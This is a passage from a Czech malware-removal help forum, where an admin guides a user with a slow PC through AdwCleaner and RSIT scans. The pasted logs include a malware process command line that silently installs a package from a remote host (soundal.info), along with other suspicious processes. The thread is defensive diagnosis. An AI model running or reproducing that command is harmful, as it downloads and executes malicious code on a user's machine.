R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2018-01-01 213736]
R1 aswArPot;aswArPot; C:\Windows\system32\drivers\aswArPot.sys [2018-05-24 196640]
R1 aswbidsdriver;aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [2018-05-24 227504]
R1 aswHdsKe;aswHdsKe; C:\Windows\system32\drivers\aswHdsKe.sys [2018-05-24 234560]
R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [2018-05-24 111360]
R1 aswSnx;aswSnx; C:\Windows\system32\drivers\aswSnx.sys [2018-05-24 1027720]
R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2018-05-24 460520]
R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2012-01-12 514560]
R2 aswMonFlt;aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [2018-05-24 159120]
R2 aswStm;aswStm; C:\Windows\system32\drivers\aswStm.sys [2018-05-24 205976]
R2 npf;NetGroup Packet Filter Driver; C:\Windows\system32\drivers\npf.sys [2011-02-11 35344]
R3 amdkmdag;amdkmdag; C:\Windows\system32\DRIVERS\atikmdag.sys [2013-10-08 12534784]
R3 amdkmdap;amdkmdap; C:\Windows\system32\DRIVERS\atikmpag.sys [2013-10-08 619008]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service; C:\Windows\system32\drivers\AtihdW76.sys [2016-04-01 104976]
R3 RTL8167;Realtek 8167 NT Driver; C:\Windows\system32\DRIVERS\Rt64win7.sys [2009-03-01 187392]
S3 aswHwid;aswHwid; C:\Windows\system32\drivers\aswHwid.sys [2018-05-24 46968]
S3 BridgeMP;@%SystemRoot%\system32\bridgeres.dll,-1; C:\Windows\system32\DRIVERS\bridge.sys [2012-01-12 95232]
S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys [2010-11-21 71168]
S3 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-14 12352]
S3 prwntdrv;prwntdrv; \??\C:\Windows\syswow64\prwntdrv.sys [2014-10-23 15456]
S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2012-01-12 165888]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys [2012-08-23 19456]
S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys [2010-11-21 6656]
S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys [2010-11-21 34688]
S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys [2013-10-02 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys [2012-08-23 30208]
S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys [2010-11-21 199552]
S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [2010-11-21 21760]
======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2018-03-21 83984]
R2 AMD External Events Utility;AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [2013-10-08 239616]
R2 avast! Antivirus;Avast Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2018-05-24 317280]
R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2012-01-12 27648]
R2 DiagTrack;@%SystemRoot%\system32\UtcResources.dll,-3001; C:\Windows\System32\svchost.exe [2012-01-12 27648]
R3 aswbIDSAgent;aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [2018-05-24 7620096]
S2 avast;Služba %1!s! Update (avast); C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [2018-06-13 164984]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2017-04-21 107656]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2017-04-21 128648]
S2 gupdate;Služba Google Update (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-12-17 153752]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service; C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-08-14 335872]
S3 AppMgmt;@appmgmts.dll,-3250; C:\Windows\system32\svchost.exe [2012-01-12 27648]
S3 avastm;Služba %1!s! Update (avastm); C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [2018-06-13 164984]
S3 gupdatem;Služba Google Update (gupdatem); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-12-17 153752]
S3 gusvc;Google Updater Service; C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe [2015-02-13 136120]
S3 IEEtwCollectorService;@%SystemRoot%\system32\ieetwcollectorres.dll,-1000; C:\Windows\system32\IEEtwCollector.exe [2017-12-29 116224]
S3 MozillaMaintenance;Mozilla Maintenance Service; C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe [2018-08-11 194512]
S3 ose;Office Source Engine; C:\Program Files (x86)\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2003-07-28 89136]
S3 PeerDistSvc;@%SystemRoot%\system32\peerdistsvc.dll,-9000; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 StorSvc;@%SystemRoot%\System32\StorSvc.dll,-100; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 UmRdpService;@%SystemRoot%\system32\umrdp.dll,-1000; C:\Windows\System32\svchost.exe [2012-01-12 27648]
S3 WatAdminSvc;@%SystemRoot%\system32\Wat\WatUX.exe,-601; C:\Windows\system32\Wat\WatAdminSvc.exe [2013-10-30 1255736]
S4 aspnet_state;Stavová služba ASP.NET; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe [2017-04-21 52856]
S4 NetMsmqActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8195; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
S4 NetPipeActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8197; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
S4 NetTcpActivator;@C:\Windows\Microsoft.NET\Framework64\v4.0.30319\\ServiceModelInstallRC.dll,-8199; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe [2017-04-21 136312]
-----------------EOF-----------------
Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz
Zpomalené PC
Moderátor: Moderátoři
Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
-
Rudy
- Site Admin
- Příspěvky: 118251
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Zpomalené PC
Zdravím!
Spusťte tuto utilitu:
Spusťte tuto utilitu:
Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/
ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: Zpomalené PC
Mám tu problém.Výše uvedené odkazy se chvíli načítají a poté spadne prohlížeč jako kdybych ho ukončil.Zkusil jsem i několikrát do vyhledávače zadat pouze samotný název AdwCleaner a také se prohlížeč sám hned ukončil.To se mi nikdy předtím nestalo.
-
Rudy
- Site Admin
- Příspěvky: 118251
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Zpomalené PC
Zkuste tento:
Ignorujte žádost na stažení novější verze.
Ignorujte žádost na stažení novější verze.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: Zpomalené PC
Tak jsem to zkusil.Bohužel nedostanu se do něj.Na mžik se objeví v raru adwcleaner.exe a hned se operace přeruší.
-
Rudy
- Site Admin
- Příspěvky: 118251
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Zpomalené PC
Zkuste to v nouz. režimu.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: Zpomalené PC
Podařilo se.
AdwCleaner log:
# AdwCleaner v6.043 - Log vytvořen 04/09/2018 v 21:01:38
# Aktualizováno dne 27/01/2017 z Malwarebytes
# Databáze : 2017-01-27.1 [Místní]
# Operační systém : Windows 7 Professional Service Pack 1 (X64)
# Uživatelské jméno : Drone - DRONE-PC
# Spuštěno z : C:\Users\Drone\AppData\Local\Temp\Rar$EXa1224.38560\adwcleaner_6.043.exe
# Mod: Čištění
# Podpora : https://www.malwarebytes.com/support
***** [ Služby ] *****
***** [ Složky ] *****
[-] Složka smazána: C:\Users\Drone\AppData\Roaming\AGData
***** [ Soubory ] *****
***** [ DLL ] *****
***** [ WMI ] *****
***** [ Zástupci ] *****
***** [ Naplánované úlohy ] *****
***** [ Registry ] *****
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Software.OneClickProcessLauncherMachine
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Software.OneClickProcessLauncherMachine.1.0
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Classes\Software.OneClickProcessLauncherMachine
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Classes\Software.OneClickProcessLauncherMachine.1.0
[-] Klíč smazán: [x64] HKLM\SOFTWARE\WISECLEANER
***** [ Prohlížeče ] *****
*************************
:: "Tracing" klíče smazány
:: Winsock nastavení vyčištěno
*************************
C:\AdwCleaner\AdwCleaner[C0].txt - [1322 Bajty] - [04/09/2018 21:01:38]
C:\AdwCleaner\AdwCleaner[S0].txt - [1755 Bajty] - [04/09/2018 20:59:42]
########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [1468 Bajty] ##########
AdwCleaner log:
# AdwCleaner v6.043 - Log vytvořen 04/09/2018 v 21:01:38
# Aktualizováno dne 27/01/2017 z Malwarebytes
# Databáze : 2017-01-27.1 [Místní]
# Operační systém : Windows 7 Professional Service Pack 1 (X64)
# Uživatelské jméno : Drone - DRONE-PC
# Spuštěno z : C:\Users\Drone\AppData\Local\Temp\Rar$EXa1224.38560\adwcleaner_6.043.exe
# Mod: Čištění
# Podpora : https://www.malwarebytes.com/support
***** [ Služby ] *****
***** [ Složky ] *****
[-] Složka smazána: C:\Users\Drone\AppData\Roaming\AGData
***** [ Soubory ] *****
***** [ DLL ] *****
***** [ WMI ] *****
***** [ Zástupci ] *****
***** [ Naplánované úlohy ] *****
***** [ Registry ] *****
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Software.OneClickProcessLauncherMachine
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Software.OneClickProcessLauncherMachine.1.0
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Classes\Software.OneClickProcessLauncherMachine
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Classes\Software.OneClickProcessLauncherMachine.1.0
[-] Klíč smazán: [x64] HKLM\SOFTWARE\WISECLEANER
***** [ Prohlížeče ] *****
*************************
:: "Tracing" klíče smazány
:: Winsock nastavení vyčištěno
*************************
C:\AdwCleaner\AdwCleaner[C0].txt - [1322 Bajty] - [04/09/2018 21:01:38]
C:\AdwCleaner\AdwCleaner[S0].txt - [1755 Bajty] - [04/09/2018 20:59:42]
########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [1468 Bajty] ##########
-
Rudy
- Site Admin
- Příspěvky: 118251
- Registrován: 30 říj 2003 13:42
- Bydliště: Plzeň
- Kontaktovat uživatele:
Re: Zpomalené PC
Dejte nový log RSIT.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.
Navštivte:
e-mail: rudy(zavináč)forum.viry.cz
Varování: Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!
Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.
Re: Zpomalené PC
RSIT log:
Logfile of random's system information tool 1.10 (written by random/random)
Run by Drone at 2018-09-05 16:07:12
Microsoft Windows 7 Professional Service Pack 1
System drive C: has 47 GB (20%) free of 238 GB
Total RAM: 4094 MB (57% free)
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 16:07:24, on 5.9.2018
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.18894)
Boot mode: Normal
Running processes:
C:\Windows\SysWOW64\EhYeIeLWi.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Windows\syswow64\MsiExec.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe
C:\Program Files\trend micro\Drone.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkI ... id=UE12DHP
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: IEExtension.VDownloaderBHO - {7b523e7c-f096-4e36-a0cb-7efeb5c675c1} - mscoree.dll (file missing)
O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: aswbIDSAgent - AVAST Software - C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
O23 - Service: Služba %1!s! Update (avast) (avast) - AVAST Software - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe
O23 - Service: Avast Antivirus (avast! Antivirus) - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: Služba %1!s! Update (avastm) (avastm) - AVAST Software - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 5910 bytes
======Listing Processes======
\SystemRoot\System32\smss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
wininit.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
winlogon.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
atieclxx
C:\Windows\system32\svchost.exe -k NetworkService
"C:\Program Files\AVAST Software\Avast\AvastSvc.exe"
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
"taskhost.exe"
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
C:\Windows\System32\svchost.exe -k utcsvc
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
"C:\Program Files (x86)\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler.exe"
"C:\Program Files (x86)\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler64.exe"
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
taskeng.exe {9F7464FB-F858-4C01-B903-B02E4632587B}
C:\Windows\SysWOW64\EhYeIeLWi.exe /q /i http://soundal.info/v9b320qcn586.xue
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\SearchIndexer.exe /Embedding
AvastUI.exe /nogui
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
C:\Windows\syswow64\MsiExec.exe -Embedding D9DC1851A781B7F5533C7DD50E245F0E
"C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
"C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM" PriorityLow
"C:\Users\Drone\AppData\Local\Media Network Sharing\msiexec64.exe"
\??\C:\Windows\system32\conhost.exe "-19937277911490919693-933249300-908891384-1566048741-249081015458105671364535199
\??\C:\Windows\system32\conhost.exe "171234901509696851-1045070504-55454072-1365905644312556696407872644-2096392339
"C:\Windows\SysWOW64\resources.bin" "-n" "msiexec64.exe"
C:\Windows\system32\wbem\unsecapp.exe -Embedding
"C:\Windows\SysWOW64\svchost.exe"
"C:\Windows\SysWOW64\svchost.exe" --config="C:\Users\Drone\AppData\Local\Temp\[495E8E]"
\??\C:\Windows\system32\conhost.exe "-91096917611275100337083751712060422261810659854-2085465575-1573627024258217638
"C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe" 0
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Drone\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Drone\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Drone\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fee87c24d0,0x7fee87c24e0,0x7fee87c24f0
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=4092 --on-initialized-event-handle=348 --parent-handle=352 /prefetch:6
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=D9CF77074821AC598E5B376AE36B11EB --mojo-platform-channel-handle=1108 --ignored=" --type=renderer " /prefetch:2
"C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe"
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=93FB6E71E51720C4AFEF2E896CE3333A --lang=cs --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=93FB6E71E51720C4AFEF2E896CE3333A --renderer-client-id=3 --mojo-platform-channel-handle=2160 /prefetch:1
